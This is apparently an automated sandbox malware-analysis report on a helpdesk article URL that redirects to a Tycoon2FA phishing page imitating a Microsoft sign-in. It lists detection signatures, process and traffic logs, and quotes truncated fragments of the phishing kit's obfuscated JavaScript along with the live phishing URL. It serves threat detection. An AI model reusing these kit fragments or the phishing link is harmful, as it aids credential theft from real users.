Edit tour

Windows Analysis Report
https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualità

Overview

General Information

Sample URL:https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualità
Analysis ID:1642923
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:96
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded SVGs detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,4514877472533986594,3070483156680054246,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_171JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    SourceRuleDescriptionAuthorStrings
    1.23.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      1.23.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
        1.28..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          1.25.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            1.25.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
              Click to see the 19 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'cmpx.wkxpowx.es' does not match the legitimate domain for Microsoft., The URL contains unusual elements and does not resemble any known Microsoft subdomains or services., The domain extension '.es' is not typically associated with Microsoft's primary services., The URL structure and domain name do not align with Microsoft's typical branding and domain usage. DOM: 2.10.pages.csv
              Source: Yara matchFile source: 2.10.pages.csv, type: HTML
              Source: Yara matchFile source: 2.9.pages.csv, type: HTML
              Source: Yara matchFile source: 1.23.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.6.pages.csv, type: HTML
              Source: Yara matchFile source: 1.7.pages.csv, type: HTML
              Source: Yara matchFile source: 1.23.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.6.pages.csv, type: HTML
              Source: Yara matchFile source: 1.7.pages.csv, type: HTML
              Source: Yara matchFile source: 2.42..script.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_171, type: DROPPED
              Source: Yara matchFile source: 2.39.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.28..script.csv, type: HTML
              Source: Yara matchFile source: 1.25.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.6.pages.csv, type: HTML
              Source: Yara matchFile source: 1.32.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.34..script.csv, type: HTML
              Source: Yara matchFile source: 2.35..script.csv, type: HTML
              Source: Yara matchFile source: 1.7.pages.csv, type: HTML
              Source: Yara matchFile source: 2.10.pages.csv, type: HTML
              Source: Yara matchFile source: 2.9.pages.csv, type: HTML
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: Number of links: 0
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: Total embedded SVG size: 130384
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: Base64 decoded: https://enervit.freshdesk.com:443
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: Title: Account Sign-In Access does not match URL
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: Invalid link: Terms of use
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: Invalid link: Privacy & cookies
              Source: https://cmpx.wkxpowx.es/GUGXxy/HTTP Parser: function oninkakrzm(){aljmwkhqbt = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+vgvjacbtb2x1dglvbnmglsbjbm5vdmf0aw5nihrozsbgdxr1cmu8l3rpdgxlpgogidxzdhlszt4kicagigjvzhkgewogicagicbmb250lwzhbwlsetogqxjpywwsihnhbnmtc2vyawy7ciagicagigxpbmutagvpz2h0oiaxljy7ciagicagig1hcmdpbjogmdskicagicagcgfkzgluzzogmdskicagicagymfja2dyb3vuzc1jb2xvcjogi2y0zjrmndskicagicagy29sb3i6icmzmzm7ciagicb9ciagicbozwfkzxigewogicagicbiywnrz3jvdw5koiajmda1ytllowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzogmjbwecawowogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogmi41cmvtowogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogizmzmzskicagicagy29sb3i6icnmzmy7ciagicagihbhzgrpbmc6idewchg7ciagicagihrlehqtywxpz246ignlbnrlcjskicagih0kicagig5hdibhihskicagicagy29sb3i6icnmzmy7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagbwfyz2luoiawide1chg7c...
              Source: anonymous functionHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "t0yrfj";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/cvzdso0pcdrnfu983q6exvncoj4rbpdrih7wrwoka7xgksbaote86um94g";var gdf = "/ijyosnhy5t8jbcpfx1m5jeyzhmc7g9fe9azfh33vbjab111";var odf = "/ijuwbmln26afqlu8xrwk8uvu6cw6emfrdxngzwxab646";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/edg/i...
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: Iframe src: /support/recaptcha#6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQ
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: <input type="password" .../> found
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: No favicon
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: No favicon
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: No favicon
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: No favicon
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: No favicon
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: No <meta name="author".. found
              Source: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0HTTP Parser: No <meta name="copyright".. found
              Source: https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJHTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 54.163.169.242:443 -> 192.168.2.16:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.163.169.242:443 -> 192.168.2.16:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.205.128:443 -> 192.168.2.16:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.72.189.255:443 -> 192.168.2.16:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.205.128:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.205.128:443 -> 192.168.2.16:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.222.225.5:443 -> 192.168.2.16:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.227:443 -> 192.168.2.16:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.227:443 -> 192.168.2.16:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.36:443 -> 192.168.2.16:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.58.72:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49774 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49776 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.122:443 -> 192.168.2.16:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.16:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.16:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49809 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 8MB later: 44MB
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.3
              Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.3
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0 HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0 HTTP/1.1Host: enervit.freshdesk.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/styles/theme.css HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/vendor.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/scripts/head.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/images/no-results.png HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /cdn.freshdesk.com/data/helpdesk/attachments/production/156003954543/original/gKEuNY8F__FVOfN6eenNQVYZU1_NS71WOg.gif?1742086686 HTTP/1.1Host: s3.amazonaws.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://enervit.freshdesk.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn.freshdesk.com/data/helpdesk/attachments/production/156003954540/original/PTiHt9qRb1C4TyB5En3ZG-X76H6VeEpmhw.png?1742086631 HTTP/1.1Host: s3.amazonaws.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://enervit.freshdesk.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/images/no-results.png HTTP/1.1Host: enervit.freshdesk.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0/hit HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /cdn.freshdesk.com/data/helpdesk/attachments/production/156003954543/original/gKEuNY8F__FVOfN6eenNQVYZU1_NS71WOg.gif?1742086686 HTTP/1.1Host: s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/scripts/bottom.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /cdn.freshdesk.com/data/helpdesk/attachments/production/156003954540/original/PTiHt9qRb1C4TyB5En3ZG-X76H6VeEpmhw.png?1742086631 HTTP/1.1Host: s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/scripts/locales/en.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/scripts/single-solution.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/scripts/marketplace.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
